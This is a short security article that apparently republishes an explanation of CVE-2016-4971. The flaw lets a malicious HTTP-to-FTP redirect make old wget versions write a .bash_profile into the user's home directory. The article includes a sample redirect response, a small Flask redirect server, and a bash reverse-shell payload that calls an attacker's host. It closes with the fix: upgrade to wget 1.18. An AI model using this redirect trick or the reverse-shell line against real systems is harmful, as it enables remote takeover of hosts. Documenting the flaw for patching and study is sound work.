BestHub
Sign in
Information Security 5 min read

How CVE‑2016‑4971 Lets Attackers Hijack wget to Install Rootkits

The CVE‑2016‑4971 vulnerability in older wget versions allows attackers to redirect HTTP downloads to malicious FTP resources, causing hidden .bash_profile files to be written and executed, which can grant full host compromise and rootkit installation.

AI Cyberspace
AI Cyberspace
AI Cyberspace
How CVE‑2016‑4971 Lets Attackers Hijack wget to Install Rootkits

Vulnerability description – CVE‑2016‑4971 has been disclosed and affects all older versions of wget. Attackers can exploit this flaw to phish programmers and operations engineers, gaining host privileges or planting rootkits.

How the flaw works – wget is a common *nix download tool supporting HTTP, HTTPS, FTP, etc. When wget follows an HTTP redirect to an FTP URL, it trusts the redirected FTP link and filename without performing a second verification, potentially downloading a malicious file that compromises the host.

For example, requesting wget http://attackers-server/safe_file.txt may receive the following HTTP response:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

If the user's home directory does not already contain a .bash_profile, wget will save the redirected file as .bash_profile in the home directory. The attacker can embed any malicious code in this file, which will be executed the next time a shell is started, leading to host compromise.

Attack demonstration

The following simple HTTP service (testWget.py) redirects to an FTP resource containing a malicious .bash_profile payload:

#!/usr/bin/env python
from flask import Flask, redirect
app = Flask(__name__)
@app.route("/noharm.txt")
def test():
return redirect("ftp://192.168.50.116/.bash_profile")
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80)

On the machine 192.168.50.116, an FTP service is started and the payload bash -i >& /dev/tcp/74.207.xxx.xxx/9980 0>&1 is placed in the .bash_profile. A listener on port 9980 is opened on the attacker’s VPS.

From another host 192.168.50.61, the attacker runs: wget http://192.168.50.116/noharm.txt After exiting and re‑entering the shell (triggering .bash_profile), the malicious code executes, granting the attacker a shell on 192.168.50.61. The attacker can then obtain full shell privileges on the target.

Remediation – Upgrade wget to GNU wget 1.18 or later, which fixes the redirect verification issue.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

SecurityRootkitwgetCVE-2016-4971ftp redirect
AI Cyberspace
Written by

AI Cyberspace

AI, big data, cloud computing, and networking.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment